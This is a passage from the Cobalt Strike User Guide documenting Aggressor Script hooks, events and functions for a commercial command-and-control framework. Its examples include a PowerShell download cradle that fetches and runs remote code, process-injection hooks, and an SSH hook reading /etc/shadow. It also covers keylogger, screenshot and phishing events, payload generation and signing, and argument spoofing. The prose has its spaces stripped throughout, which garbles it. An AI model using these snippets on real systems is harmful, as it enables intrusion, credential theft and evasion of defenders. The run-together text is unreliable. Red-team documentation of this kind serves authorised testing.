else { return "powershell -nop -exec bypass -EncodedCommand $script"; } } POWERSHELL_COMPRESS AhookusedbytheresourcekittocompressaPowerShellscript.Thedefaultusesgzipand returnsadeflatorscript. ResourceKit ThishookisdemonstratedintheThe Resource Kit on page 92. Arguments $1-thescripttocompress POWERSHELL_DOWNLOAD_CRADLE ChangetheformofthePowerShelldownloadcradleusedinCobaltStrike'spost-exautomation. Thisincludesjumpwinrm|winrm64,[host]->Access->OneLiner,andpowershell-import. Arguments $1-theURLofthe(localhost)resourcetoreach ResourceKit ThishookisdemonstratedintheThe Resource Kit on page 92. Example CobaltStrikeUserGuide www.fortra.com page:230
AggressorScript/Hooks set POWERSHELL_DOWNLOAD_CRADLE { return "IEX (New-Object Net.Webclient).DownloadString(' $+ $1 $+ ')"; } PROCESS_INJECT_EXPLICIT Hooktoallowuserstodefinehowtheexplicitprocessinjectiontechniqueisimplementedwhen executingpostexploitationcommandsusingaBeaconObjectFile(BOF). Arguments $1-BeaconID $2-memoryinjectabledll(position-independentcode) $3-thePIDtoinjectinto $4-offsettojumpto $5-x86/x64-memoryinjectableDLLarch Returns Returnanonemptyvaluewhendefiningyourownexplicitprocessinjectiontechnique. Return$nulltousethedefaultexplicitprocessinjectiontechnique. PostExploitationJobs ThefollowingpostexploitationcommandssupportthePROCESS_INJECT_EXPLICIThook.The CommandcolumndisplaysthecommandtobeusedintheBeaconwindow,TheAggressor Scriptcolumndisplaystheaggressorscriptfunctiontobeusedinscripts,andtheUIcolumn displayswhichmenuoptiontouse. AdditionalInformation l The[ProcessBrowser]interfaceisaccessedby[beacon] -> Explore -> Process List. Thereisalsoamultiversionofthisinterfacewhichisaccessedbyselectingmultiple sessionsandusingthesameUImenu.WhenintheProcessBrowserusethebuttonsto perform additionalcommandsontheselectedprocess. CobaltStrikeUserGuide www.fortra.com page:231
AggressorScript/Hooks l Thechromedump,dcsync,hashdump,keylogger,logonpasswords,mimikatz,net, portscan,printscreen,pth,screenshot,screenwatch,ssh,andssh-key commands alsohaveafork&runversion.Tousetheexplicitversionrequiresthepidandarchitecture arguments. l Forthenet and&bnet commandthe‘domain’commandwillnotusethehook. JobTypes Command Aggressor Script UI browserpivot &bbrowserpivot [beacon]->Explore->BrowserPivot chromedump dcsync &bdcsync dllinject &bdllinject hashdump &bhashdump inject &binject [ProcessBrowser]->Inject keylogger &bkeylogger [ProcessBrowser]->LogKeystrokes logonpasswords &blogonpasswords mimikatz &bmimikatz &bmimikatz_small net &bnet portscan &bportscan printscreen &bprintscreen psinject &bpsinject pth &bpassthehash screenshot &bscreenshot [ProcessBrowser]->Screenshot(Yes) screenwatch &bscreenwatch [ProcessBrowser]->Screenshot(No) shinject &bshinject ssh &bssh ssh-key &bssh_key Example CobaltStrikeUserGuide www.fortra.com page:232
AggressorScript/Hooks
Hook to allow the user to define how the explicit injection technique
is implemented when executing post exploitation commands.
$1 = Beacon ID
$2 = memory injectable dll for the post exploitation command
$3 = the PID to inject into
$4 = offset to jump to
$5 = x86/x64 - memory injectable DLL arch
set PROCESS_INJECT_EXPLICIT { local('$barch $handle $data $args $entry');
Set the architecture for the beacon's session
$barch = barch($1);
read in the injection BOF based on barch
warn("read the BOF: inject_explicit. $+ $barch $+ .o"); $handle = openf(script_resource("inject_explicit. $+ $barch $+ .o")); $data = readb($handle, -1); closef($handle);
pack our arguments needed for the BOF
$args = bof_pack($1, "iib", $3, $4, $2); btask($1, "Process Inject using explicit injection into pid $3");
Set the entry point based on the dll's arch
$entry = "go $+ $5"; beacon_inline_execute($1, $data, $entry, $args);
Let the caller know the hook was implemented.
return 1; } PROCESS_INJECT_SPAWN Hooktoallowuserstodefinehowtheforkandrunprocessinjectiontechniqueisimplemented whenexecutingpostexploitationcommandsusingaBeaconObjectFile(BOF). Arguments $1 -BeaconID $2 -memoryinjectabledll(position-independentcode) $3 -true/falseignoreprocesstoken $4 -x86/x64-memoryinjectableDLLarch CobaltStrikeUserGuide www.fortra.com page:233
AggressorScript/Hooks Returns Returnanonemptyvaluewhendefiningyourownforkandrunprocessinjectiontechnique. Return$nulltousethedefaultforkandruninjectiontechnique. PostExploitationJobs ThefollowingpostexploitationcommandssupportthePROCESS_INJECT_SPAWNhook.The CommandcolumndisplaysthecommandtobeusedintheBeaconwindow,TheAggressor Scriptcolumndisplaystheaggressorscriptfunctiontobeusedinscripts,andtheUIcolumn displayswhichmenuoptiontouse. AdditionalInformation l Theelevate,runasadmin,&belevate,&brunasadmin and[beacon] -> Access -> Elevate commandswillonlyusethePROCESS_INJECT_SPAWNhookwhenthe specifiedexploitusesoneofthelistedaggressorscriptfunctionsinthetable,for example&bpowerpick. l Forthenet and&bnet commandthe‘domain’commandwillnotusethehook. l The‘(useahash)’notemeansselectacredentialthatreferencesahash. JobTypes Command Aggressor Script UI chromedump dcsync &bdcsync elevate &belevate [beacon]->Access->Elevate [beacon]->Access->GoldenTicket hashdump &bhashdump [beacon]->Access->DumpHashes keylogger &bkeylogger logonpasswords &blogonpasswords [beacon]->Access->RunMimikatz [beacon]->Access->MakeToken(usea hash) mimikatz &bmimikatz &bmimikatz_small CobaltStrikeUserGuide www.fortra.com page:234
AggressorScript/Hooks Command Aggressor Script UI net &bnet [beacon]->Explore->NetView portscan &bportscan [beacon]->Explore->PortScan powerpick &bpowerpick printscreen &bprintscreen pth &bpassthehash runasadmin &brunasadmin [target]->Scan screenshot &bscreenshot [beacon]->Explore->Screenshot screenwatch &bscreenwatch ssh &bssh [target]->Jump->ssh ssh-key &bssh_key [target]->Jump->ssh-key [target]->Jump->exploit Example
------------------------------------
$1 = Beacon ID
$2 = memory injectable dll (position-independent code)
$3 = true/false ignore process token
$4 = x86/x64 - memory injectable DLL arch
------------------------------------
set PROCESS_INJECT_SPAWN { local('$barch $handle $data $args $entry');
Set the architecture for the beacon's session
$barch = barch($1);
read in the injection BOF based on barch
warn("read the BOF: inject_spawn. $+ $barch $+ .o"); $handle = openf(script_resource("inject_spawn. $+ $barch $+ .o")); $data = readb($handle, -1); closef($handle);
pack our arguments needed for the BOF
$args = bof_pack($1, "sb", $3, $2); btask($1, "Process Inject using fork and run");
Set the entry point based on the dll's arch
$entry = "go $+ $4"; CobaltStrikeUserGuide www.fortra.com page:235
AggressorScript/Hooks beacon_inline_execute($1, $data, $entry, $args);
Let the caller know the hook was implemented.
return 1; } PSEXEC_SERVICE Settheservicenameusedbyjumppsexec|psexec64|psexec_pshandpsexec. Example set PSEXEC_SERVICE { return "foobar"; } PYTHON_COMPRESS CompressaPythonscriptgeneratedbyCobaltStrike. Arguments $1-thescripttocompress ResourceKit ThishookisdemonstratedintheThe Resource Kit on page 92. Example set PYTHON_COMPRESS { return "import base64; exec base64.b64decode("" . base64_encode($1) . "")"; } RESOURCE_GENERATOR ControltheformatoftheVBStemplateusedinCobaltStrike. ResourceKit CobaltStrikeUserGuide www.fortra.com page:236
AggressorScript/Hooks ThishookisdemonstratedintheThe Resource Kit on page 92. Arguments $1-theshellcodetoinjectandrun RESOURCE_GENERATOR_VBS ControlsthecontentoftheHTMLApplicationUser-driven(EXEOutput)generatedbyCobalt Strike. Arguments $1-theEXEdata $2-thenameofthe.exe ResourceKit ThishookisdemonstratedintheThe Resource Kit on page 92. Example set HTMLAPP_EXE { local('$handle $data'); $handle = openf(script_resource("template.exe.hta")); $data = readb($handle, -1); closef($handle); $data = strrep($data, '##EXE##', transform($1, "hex")); $data = strrep($data, '##NAME##', $2); return $data; } SIGNED_APPLET_MAINCLASS SpecifyaJavaAppletfiletousefortheJavaSignedAppletAttack.SeeJava Signed Applet Attack on page 80. AppletKit CobaltStrikeUserGuide www.fortra.com page:237
AggressorScript/Hooks ThishookisdemonstratedintheAppletKit.TheAppletKitisavailableviatheCobaltStrike Arsenal(Help->Arsenal). Example set SIGNED_APPLET_MAINCLASS { return "Java.class"; } SIGNED_APPLET_RESOURCE SpecifyaJavaAppletfiletousefortheJavaSignedAppletAttack.SeeJava Signed Applet Attack on page 80. AppletKit ThishookisdemonstratedintheAppletKit.TheAppletKitisavailableviatheCobaltStrike Arsenal(Help->Arsenal). Example set SIGNED_APPLET_RESOURCE { return script_resource("dist/applet_signed.jar"); } SMART_APPLET_MAINCLASS SpecifytheMAINclassoftheJavaSmartAppletAttack.SeeJava Smart Applet Attack on page 81. AppletKit ThishookisdemonstratedintheAppletKit.TheAppletKitisavailableviatheCobaltStrike Arsenal(Help->Arsenal). Example set SMART_APPLET_MAINCLASS { return "Java.class"; } CobaltStrikeUserGuide www.fortra.com page:238
AggressorScript/Events SMART_APPLET_RESOURCE SpecifyaJavaAppletfiletousefortheJavaSmartAppletAttack.SeeJava Smart Applet Attack on page 81. AppletKit ThishookisdemonstratedintheAppletKit.TheAppletKitisavailableviatheCobaltStrike Arsenal(Help->Arsenal). Example set SMART_APPLET_RESOURCE { return script_resource("dist/applet_rhino.jar"); } Events ThesearetheeventsfiredbyAggressorScript. * ThiseventfireswheneveranyAggressorScripteventfires. Arguments $1-theoriginaleventname ...-theargumentstotheevent Example
event spy script
on * { println("[ $+ $1 $+ ]: " . subarray(@_, 1)); } beacon_checkin CobaltStrikeUserGuide www.fortra.com page:239
AggressorScript/Events FiredwhenaBeaconcheckinacknowledgementispostedtoaBeacon'sconsole. Arguments $1-theIDofthebeacon $2-thetextofthemessage $3-whenthismessageoccurred beacon_error FiredwhenanerrorispostedtoaBeacon'sconsole. Arguments $1-theIDofthebeacon $2-thetextofthemessage $3-whenthismessageoccurred beacon_indicator FiredwhenanindicatorofcompromisenoticeispostedtoaBeacon'sconsole. Arguments $1-theIDofthebeacon $2-theuserresponsiblefortheinput $3-thetextofthemessage $4-whenthismessageoccurred beacon_initial FiredwhenaBeaconcallshomeforthefirsttime. Arguments CobaltStrikeUserGuide www.fortra.com page:240
AggressorScript/Events $1-theIDofthebeaconthatcalledhome. Example on beacon_initial {
list network connections
bshell($1, "netstat -na | findstr "ESTABLISHED"");
list shares
bshell($1, "net use");
list groups
bshell($1, "whoami /groups"); } beacon_initial_empty FiredwhenaDNSBeaconcallshomeforthefirsttime.Atthispoint,nometadatahasbeen exchanged. Arguments $1-theIDofthebeaconthatcalledhome. Example on beacon_initial_empty { binput($1, "[Acting on new DNS Beacon]");
change the data channel to DNS TXT
bmode($1, "dns-txt");
request the Beacon checkin and send its metadata
bcheckin($1); } beacon_input FiredwhenaninputmessageispostedtoaBeacon'sconsole. Arguments CobaltStrikeUserGuide www.fortra.com page:241
AggressorScript/Events $1-theIDofthebeacon $2-theuserresponsiblefortheinput $3-thetextofthemessage $4-whenthismessageoccurred beacon_mode FiredwhenamodechangeacknowledgementispostedtoaBeacon'sconsole. Arguments $1-theIDofthebeacon $2-thetextofthemessage $3-whenthismessageoccurred beacon_output FiredwhenoutputispostedtoaBeacon'sconsole. Arguments $1-theIDofthebeacon $2-thetextofthemessage $3-whenthismessageoccurred beacon_output_alt Firedwhen(alternate)outputispostedtoaBeacon'sconsole.Whatmakesforalternateoutput? It'sjustdifferentpresentationfromnormaloutput. Arguments $1-theIDofthebeacon $2-thetextofthemessage CobaltStrikeUserGuide www.fortra.com page:242
AggressorScript/Events $3-whenthismessageoccurred beacon_output_jobs FiredwhenjobsoutputissenttoaBeacon'sconsole. Arguments $1-theIDofthebeacon $2-thetextofthejobsoutput $3-whenthismessageoccurred beacon_output_ls FiredwhenlsoutputissenttoaBeacon'sconsole. Arguments $1-theIDofthebeacon $2-thetextofthelsoutput $3-whenthismessageoccurred beacon_output_ps FiredwhenpsoutputissenttoaBeacon'sconsole. Arguments $1-theIDofthebeacon $2-thetextofthepsoutput $3-whenthismessageoccurred beacon_tasked FiredwhenataskacknowledgementispostedtoaBeacon'sconsole. CobaltStrikeUserGuide www.fortra.com page:243
AggressorScript/Events Arguments $1-theIDofthebeacon $2-thetextofthemessage $3-whenthismessageoccurred beacons FiredwhentheteamserversendsoverfreshinformationonallofourBeacons.Thisoccurs aboutonceeachsecond. Arguments $1-anarrayofdictionaryobjectswithmetadataforeachBeacon. custom_event_ Firedwhenaclientreceivesacustomeventfromanotherclient. Arguments $1-whosentthecustomevent $2-theeventdata $3-thetimetheeventwassent Example
subscribe to the my-topic custom event
on "custom_event_my-topic" { println("Received my-topic:") println("\tSender: $1"); println("\tData: $2"); println("\tTimestamp: $3"); } disconnect CobaltStrikeUserGuide www.fortra.com page:244
AggressorScript/Events FiredwhenthisCobaltStrikebecomesdisconnectedfromtheteamserver. event_action Firedwhenauserperformsanactionintheeventlog.ThisissimilartoanactiononIRC(the /mecommand) Arguments $1-whothemessageisfrom $2-thecontentsofthemessage $3-thetimethemessagewasposted event_beacon_initial Firedwhenaninitialbeaconmessageispostedtotheeventlog. Arguments $1-thecontentsofthemessage $2-thetimethemessagewasposted event_join Firedwhenauserconnectstotheteamserver Arguments $1-whojoinedtheteamserver $2-thetimethemessagewasposted event_newsite Firedwhenanewsitemessageispostedtotheeventlog. Arguments CobaltStrikeUserGuide www.fortra.com page:245
AggressorScript/Events $1-whosetupthenewsite $2-thecontentsofthenewsitemessage $3-thetimethemessagewasposted event_notify Firedwhenamessagefromtheteamserverispostedtotheeventlog. Arguments $1-thecontentsofthemessage $2-thetimethemessagewasposted event_nouser FiredwhenthecurrentCobaltStrikeclienttriestointeractwithauserwhoisnotconnectedto theteamserver. Arguments $1-whoisnotpresent $2-thetimethemessagewasposted event_private Firedwhenaprivatemessageispostedtotheeventlog. Arguments $1-whothemessageisfrom $2-whothemessageisdirectedto $3-thecontentsofthemessage $4-thetimethemessagewasposted CobaltStrikeUserGuide www.fortra.com page:246
AggressorScript/Events event_public Firedwhenapublicmessageispostedtotheeventlog. Arguments $1-whothemessageisfrom $2-thecontentsofthemessage $3-thetimethemessagewasposted event_quit Firedwhensomeonedisconnectsfromtheteamserver. Arguments $1-wholefttheteamserver $2-thetimethemessagewasposted heartbeat_10m Firedeverytenminutes heartbeat_10s Firedeverytenseconds heartbeat_15m Firedeveryfifteenminutes heartbeat_15s Firedeveryfifteenseconds CobaltStrikeUserGuide www.fortra.com page:247
AggressorScript/Events heartbeat_1m Firedeveryminute heartbeat_1s Firedeverysecond heartbeat_20m Firedeverytwentyminutes heartbeat_30m Firedeverythirtyminutes heartbeat_30s Firedeverythirtyseconds heartbeat_5m Firedeveryfiveminutes heartbeat_5s Firedeveryfiveseconds heartbeat_60m Firedeverysixtyminutes keylogger_hit Firedwhentherearenewresultsreportedtothewebserverviatheclonedsitekeystrokelogger. Arguments CobaltStrikeUserGuide www.fortra.com page:248
AggressorScript/Events $1-externaladdressofvisitor $2-reserved $3-theloggedkeystrokes $4-thephishingtokenfortheserecordedkeystrokes. keystrokes FiredwhenCobaltStrikereceiveskeystrokes Arguments $1-adictionarywithinformationaboutthekeystrokes. Key Value bid BeaconIDforsessionkeystrokesoriginatedfrom data keystrokedatareportedinthisbatch id identifierforthiskeystrokebuffer session desktopsessionfromkeystrokelogger title lastactivewindowtitlefromkeystrokelogger user usernamefromkeystrokelogger when timestampofwhentheseresultsweregenerated Example on keystrokes { if ("Admin" iswm $1["title"]) { blog($1["bid"], "Interesting keystrokes received. Go to \c4View -> Keystrokes\o and look for the green buffer."); highlight("keystrokes", @($1), "good"); } } profiler_hit FiredwhentherearenewresultsreportedtotheSystemProfiler. CobaltStrikeUserGuide www.fortra.com page:249
AggressorScript/Events Arguments $1-externaladdressofvisitor $2-de-cloakedinternaladdressofvisitor(or"unknown") $3-visitor'sUser-Agent $4-adictionarycontainingtheapplications. $5-thephishingtokenofthevisitor(use&tokenToEmailtoresolvetoanemailaddress) ready FiredwhenthisCobaltStrikeclientisconnectedtotheteamserverandreadytoact. screenshots FiredwhenCobaltStrikereceivesascreenshot. Arguments $1-adictionarywithinformationaboutthescreenshot. Key Value bid BeaconIDforsessionscreenshotoriginatedfrom data rawscreenshotdata(thisisa.jpgfile) id identifierforthisscreenshot session desktopsessionreportedbyscreenshottool title activewindowtitlefromscreenshottool user usernamefromscreenshottool when timestampofwhenthisscreenshotwasreceived Example
watch for any screenshots where someone is banking and
redact it from the user-interface.
on screenshots { CobaltStrikeUserGuide www.fortra.com page:250
AggressorScript/Events local('$title'); $title = lc($1["title"]); if ("bankofamerica" iswm $title) { redactobject($1["id"]); } else if ("jpmc*" iswm $title) { redactobject($1["id"]); } } sendmail_done Firedwhenaphishingcampaigncompletes Arguments $1-thecampaignID sendmail_post Firedafteraphishissenttoanemailaddress. Arguments $1-thecampaignID $2-theemailwe'resendingaphishto $3-thestatusofthephish(e.g.,SUCCESS) $4-themessagefromthemailserver sendmail_pre Firedbeforeaphishissenttoanemailaddress. Arguments $1-thecampaignID $2-theemailwe'resendingaphishto CobaltStrikeUserGuide www.fortra.com page:251
AggressorScript/Events sendmail_start Firedwhenanewphishingcampaignkicksoff. Arguments $1-thecampaignID $2-numberoftargets $3-localpathtoattachment $4-thebouncetoaddress $5-themailserverstring $6-thesubjectofthephishingemail $7-thelocalpathtothephishingtemplate $8-theURLtoembedintothephish ssh_checkin FiredwhenanSSHclientcheckinacknowledgementispostedtoanSSHconsole. Arguments $1-theIDofthesession $2-thetextofthemessage $3-whenthismessageoccurred ssh_error FiredwhenanerrorispostedtoanSSHconsole. Arguments $1-theIDofthesession CobaltStrikeUserGuide www.fortra.com page:252
AggressorScript/Events $2-thetextofthemessage $3-whenthismessageoccurred ssh_indicator FiredwhenanindicatorofcompromisenoticeispostedtoanSSHconsole. Arguments $1-theIDofthesession $2-theuserresponsiblefortheinput $3-thetextofthemessage $4-whenthismessageoccurred ssh_initial FiredwhenanSSHsessionisseenforthefirsttime. Arguments $1-theIDofthesession Example on ssh_initial { if (-isadmin $1) { bshell($1, "cat /etc/shadow"); } } ssh_input FiredwhenaninputmessageispostedtoanSSHconsole. Arguments $1-theIDofthesession CobaltStrikeUserGuide www.fortra.com page:253
AggressorScript/Events $2-theuserresponsiblefortheinput $3-thetextofthemessage $4-whenthismessageoccurred ssh_output FiredwhenoutputispostedtoanSSHconsole. Arguments $1-theIDofthesession $2-thetextofthemessage $3-whenthismessageoccurred ssh_output_alt Firedwhen(alternate)outputispostedtoanSSHconsole.Whatmakesforalternateoutput?It's justdifferentpresentationfromnormaloutput. Arguments $1-theIDofthesession $2-thetextofthemessage $3-whenthismessageoccurred ssh_tasked FiredwhenataskacknowledgementispostedtoanSSHconsole. Arguments $1-theIDofthesession $2-thetextofthemessage $3-whenthismessageoccurred CobaltStrikeUserGuide www.fortra.com page:254
AggressorScript/Functions web_hit Firedwhenthere'sanewhitonCobaltStrike'swebserver. Arguments $1-themethod(e.g.,GET,POST) $2-therequestedURI $3-thevisitor'saddress $4-thevisitor'sUser-Agentstring $5-thewebserver'sresponsetothehit(e.g.,200) $6-thesizeofthewebserver'sresponse $7-adescriptionofthehandlerthatprocessedthishit. $8-adictionarycontainingtheparameterssenttothewebserver $9-thetimewhenthehittookplace. Functions ThisisalistofAggressorScript'sfunctions. QuickJump A|B|C |D |E |F |G |H|I|J |K |L|M|N |O|P|Q|R |S |T |U |W |X|Y |Z -hasbootstraphint Checkifabytearrayhasthex86orx64bootstraphint.Usethisfunctiontodetermineifit'ssafe touseanartifactthatpassesGetProcAddress/GetModuleHandleApointerstothispayload. Arguments $1-bytearraywithapayloadorshellcode. CobaltStrikeUserGuide www.fortra.com page:255
AggressorScript/Functions Seealso &payload_bootstrap_hint -is64 Checkifasessionisonanx64systemornot(Beacononly). Arguments $1-Beacon/SessionID Example command x64 { foreach $session (beacons()) { if (-is64 $session['id']) { println($session); } } } -isactive Checkifasessionisactiveornot.Asessionisconsideredactiveif(a)ithasnotacknowledged anexitmessageAND(b)itisnotdisconnectedfromaparentBeacon. Arguments $1-Beacon/SessionID Example command active { local('$bid'); foreach $bid (beacon_ids()) { if (-isactive $bid) { println("$bid is active!"); } } } CobaltStrikeUserGuide www.fortra.com page:256
AggressorScript/Functions -isadmin Checkifasessionhasadminrights Arguments $1-Beacon/SessionID Example command admin_sessions { foreach $session (beacons()) { if (-isadmin $session['id']) { println($session); } } } -isbeacon CheckifasessionisaBeaconornot. Arguments $1-Beacon/SessionID Example command beacons { foreach $session (beacons()) { if (-isbeacon $session['id']) { println($session); } } } -isssh CheckifasessionisanSSHsessionornot. Arguments CobaltStrikeUserGuide www.fortra.com page:257
AggressorScript/Functions $1-Beacon/SessionID Example command ssh_sessions { foreach $session (beacons()) { if (-isssh $session['id']) { println($session); } } } action Postapublicactionmessagetotheeventlog.Thisissimilartothe/mecommand. Arguments $1-themessage Example action("dances!"); addTab CreateatabtodisplayaGUIobject. Arguments $1-thetitleofthetab $2-aGUIobject.AGUIobjectisonethatisaninstanceofjavax.swing.JComponent. $3-atooltiptodisplaywhenauserhoversoverthistab. Example $label = [new javax.swing.JLabel: "Hello World"]; addTab("Hello!", $label, "this is an example"); CobaltStrikeUserGuide www.fortra.com page:258
AggressorScript/Functions addVisualization RegisteravisualizationwithCobaltStrike. Arguments $1-thenameofthevisualization $2-ajavax.swing.JComponentobject Example $label = [new javax.swing.JLabel: "Hello World!"]; addVisualization("Hello World", $label); Seealso &showVisualization add_to_clipboard Addtexttotheclipboard,notifytheuser. Arguments $1-thetexttoaddtotheclipboard Example add_to_clipboard("Paste me you fool!"); alias CreatesanaliascommandintheBeaconconsole Arguments $1-thealiasnametobindto CobaltStrikeUserGuide www.fortra.com page:259
AggressorScript/Functions $2-acallbackfunction.Calledwhentheuserrunsthealias.Argumentsare:$0=commandrun, $1=beaconid,$2=arguments. Example alias("foo", { btask($1, "foo!"); }); alias_clear Removesanaliascommand(andrestoresdefaultfunctionality;ifitexisted) Arguments $1-thealiasnametoremove Example alias_clear("foo"); all_payloads Generatesallofthestagelesspayloads(inx86andx64)foralloftheconfiguredlisteners.(also availableintheUImenuunderPayloads -> Windows Stageless Generate all Payloads) Arguments $1-Thefolderpathtocreatethepayloadsin. $2-Abooleanvalueforwhethertheexecutablefilesshouldbesigned. $3–Astringvalueforthesystemcallmethod.Validvaluesare: None:UsethestandardWindowsAPIfunction. Direct:UsetheNtversionofthefunction. Indirect:JumptotheappropriateinstructionwithintheNtversionofthefunction. CobaltStrikeUserGuide www.fortra.com page:260
AggressorScript/Functions $4-(optional)ThesupportingHTTPlibraryforgeneratedbeacons(wininet|winhttp|$null|blank string). Example $folder = all_payloads "/tmp/payloads", 1, "None"); println("Payloads have been saved to $folder"); applications ReturnsalistofapplicationinformationinCobaltStrike'sdatamodel.Theseapplicationsare resultsfromtheSystemProfiler. Returns Anarrayofdictionaryobjectswithinformationabouteachapplication. Example printAll(applications()); archives ReturnsamassivelistofarchivedinformationaboutyouractivityfromCobaltStrike'sdata model.ThisinformationisleanedonheavilytoreconstructyouractivitytimelineinCobalt Strike'sreports. Returns Anarrayofdictionaryobjectswithinformationaboutyourteam'sactivity. Example foreach $index => $entry (archives()) { println("\c3( $+ $index $+ )\o $entry"); } artifact CobaltStrikeUserGuide www.fortra.com page:261
AggressorScript/Functions DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_stager instead. Generatesastagerartifact(exe,dll)fromaCobaltStrikelistener Arguments $1-thelistenername $2-theartifacttype $3-deprecated;thisparameternolongerhasanymeaning. $4-x86|x64-thearchitectureofthegeneratedstager Type Description dll anx86DLL dllx64 anx64DLL exe aplainexecutable powershell apowershellscript python apythonscript svcexe aserviceexecutable vbscript aVisualBasicscript Note Beawarethatnotalllistenerconfigurationshavex64stagers.Ifindoubt,usex86. Returns Ascalarcontainingthespecifiedartifact. Example $data = artifact("my listener", "exe"); $handle = openf(">out.exe"); writeb($handle, $data); closef($handle); CobaltStrikeUserGuide www.fortra.com page:262
AggressorScript/Functions artifact_general Generatesapayloadartifactfromarbitraryshellcode. Arguments $1-theshellcode $2-theartifacttype $3-x86|x64-thearchitectureofthegeneratedpayload Type Description dll aDLL exe aplainexecutable powershell apowershellscript python apythonscript svcexe aserviceexecutable Note WhilethePythonartifactinCobaltStrikeisdesignedtosimultaneouslycarryanx86andx64 payload;thisfunctionwillonlypopulatethescriptwiththearchitectureargumentspecifiedas $3 artifact_payload Generatesastagelesspayloadartifact(exe,dll)fromaCobaltStrikelistenername Arguments $1-thelistenername $2-theartifacttype $3-x86|x64-thearchitectureofthegeneratedpayload(stage) $4-exitmethod:'thread'(leavethethreadwhendone)or'process'(exittheprocesswhen done).Use'thread'ifinjectingintoanexistingprocess. CobaltStrikeUserGuide www.fortra.com page:263
AggressorScript/Functions $5–Astringvalueforthesystemcallmethod.Validvaluesare: None:UsethestandardWindowsAPIfunction. Direct:UsetheNtversionofthefunction. Indirect:JumptotheappropriateinstructionwithintheNtversionofthefunction. Type Description dll aDLL exe aplainexecutable powershell apowershellscript python apythonscript raw rawpayloadstage svcexe aserviceexecutable $6-(optional)ThesupportingHTTPlibraryforgeneratedbeacons(wininet|winhttp|$null|blank string). Note WhilethePythonartifactinCobaltStrikeisdesignedtosimultaneouslycarryanx86andx64 payload;thisfunctionwillonlypopulatethescriptwiththearchitectureargumentspecifiedas $3 Example $data = artifact_payload("my listener", "exe", "x86", “process”, “Indirect”); artifact_sign SignanEXEorDLLfile Arguments $1-thecontentsoftheEXEorDLLfiletosign Notes CobaltStrikeUserGuide www.fortra.com page:264
AggressorScript/Functions l Thisfunctionrequiresthatacode-signingcertificateisspecifiedinthisserver's MalleableC2profile.Ifnocode-signingcertificateisconfigured,thisfunctionwillreturn $1withnochanges. l DO NOTsignanexecutableorDLLtwice.ThelibraryCobaltStrikeusesforcode-signing willcreateaninvalid(second)signatureiftheexecutableorDLLisalreadysigned. Returns Ascalarcontainingthesignedartifact. Example
generate an artifact!
$data = artifact("my listener", "exe");
sign it.
$data = artifact_sign($data);
save it
$handle = openf(">out.exe"); writeb($handle, $data); closef($handle); artifact_stageless DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_payload instead. Generatesastagelessartifact(exe,dll)froma(local)CobaltStrikelistener Arguments $1-thelistenername(mustbelocaltothisteamserver) $2-theartifacttype $3-x86|x64-thearchitectureofthegeneratedpayload(stage) $4-proxyconfigurationstring $5-callbackfunction.Thisfunctioniscalledwhentheartifactisready.The$1argumentisthe stagelesscontent. CobaltStrikeUserGuide www.fortra.com page:265
AggressorScript/Functions Type Description dll anx86DLL dllx64 anx64DLL exe aplainexecutable powershell apowershellscript python apythonscript raw rawpayloadstage svcexe aserviceexecutable Notes l Thisfunctionprovidesthestagelessartifactviaacallbackfunction.Thisisnecessary becauseCobaltStrikegeneratespayloadstagesontheteam server. l TheproxyconfigurationstringisthesamestringyouwouldusewithPayloads -> Windows Stageless Payload.directignoresthelocalproxyconfigurationand attemptsadirectconnection.protocol://user:[email protected]:port specifieswhichproxyconfigurationtheartifactshoulduse.Theusernameand passwordareoptional(e.g.,protocol://host:portisfine).Theacceptable protocolsaresocksandhttp.Settheproxyconfigurationstringto$nullor""touse thedefaultbehavior.Custom dialogsmayuse&drow_proxyservertosetthis. l Thisfunctioncannotgenerateartifactsforlistenersonotherteam servers.Thisfunction alsocannotgenerateartifactsforforeignlisteners.Limityouruseofthisfunctionto locallisterswithstagesonly.Custom dialogsmayuse&drow_listener_stagetochoose anacceptablelistenerforthisfunction. l Note:whilethePythonartifactinCobaltStrikeisdesignedtosimultaneouslycarryan x86andx64payload;thisfunctionwillonlypopulatethescriptwiththearchitecture argumentspecifiedas$3 Example sub ready { local('$handle'); $handle = openf(">out.exe"); writeb($handle, $1); closef($handle); } artifact_stageless("my listener", "exe", "x86", "", &ready); CobaltStrikeUserGuide www.fortra.com page:266
AggressorScript/Functions artifact_stager Generatesastagerartifact(exe,dll)fromaCobaltStrikelistener Arguments $1-thelistenername $2-theartifacttype $3-x86|x64-thearchitectureofthegeneratedstager Type Description dll aDLL exe aplainexecutable powershell apowershellscript python apythonscript raw therawfile svcexe aserviceexecutable vbscript aVisualBasicscript Note Beawarethatnotalllistenerconfigurationshavex64stagers.Ifindoubt,usex86. Returns Ascalarcontainingthespecifiedartifact. Example $data = artifact_stager("my listener", "exe", "x86"); $handle = openf(">out.exe"); writeb($handle, $data); closef($handle); barch CobaltStrikeUserGuide www.fortra.com page:267
AggressorScript/Functions ReturnsthearchitectureofyourBeaconsession(e.g.,x86orx64) Arguments $1-theidforthebeacontopullmetadatafor Note Ifthearchitectureisunknown(e.g.,aDNSBeaconthathasn'tsentmetadatayet);thisfunction willreturnx86. Example println("Arch is: " . barch($1)); bargue_add ThisfunctionaddsanoptiontoBeacon'slistofcommandstospoofargumentsfor. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thecommandtospoofargumentsfor.EnvironmentvariablesareOKheretoo. $3-thefakeargumentstousewhenthespecifiedcommandisrun. Notes l Theprocessmatchisexact.IfBeacontriestolaunch"net.exe",itwillnotmatchnet, NET.EXE,orc:\windows\system32\net.exe.Itwillonlymatchnet.exe. l x86Beaconcanonlyspoofargumentsinx86childprocesses.Likewise,x64Beaconcan onlyspoofargumentsinx64childprocesses. l Therealargumentsarewrittentothememoryspacethatholdsthefakearguments.If therealargumentsarelongerthanthefakearguments,thecommandlaunchwillfail. Example
spoof cmd.exe arguments.
bargue_add($1, "%COMSPEC%", "/K "cd c:\windows\temp & startupdatenow.bat""); CobaltStrikeUserGuide www.fortra.com page:268
AggressorScript/Functions
spoof net arguments
bargue_add($1, "net", "user guest /active:no"); bargue_list Listthecommands+fakeargumentsBeaconwillspoofargumentsfor. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. Example bargue_list($1); bargue_remove ThisfunctionremovesanoptiontoBeacon'slistofcommandstospoofargumentsfor. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thecommandtospoofargumentsfor.EnvironmentvariablesareOKheretoo. Example
don't spoof cmd.exe
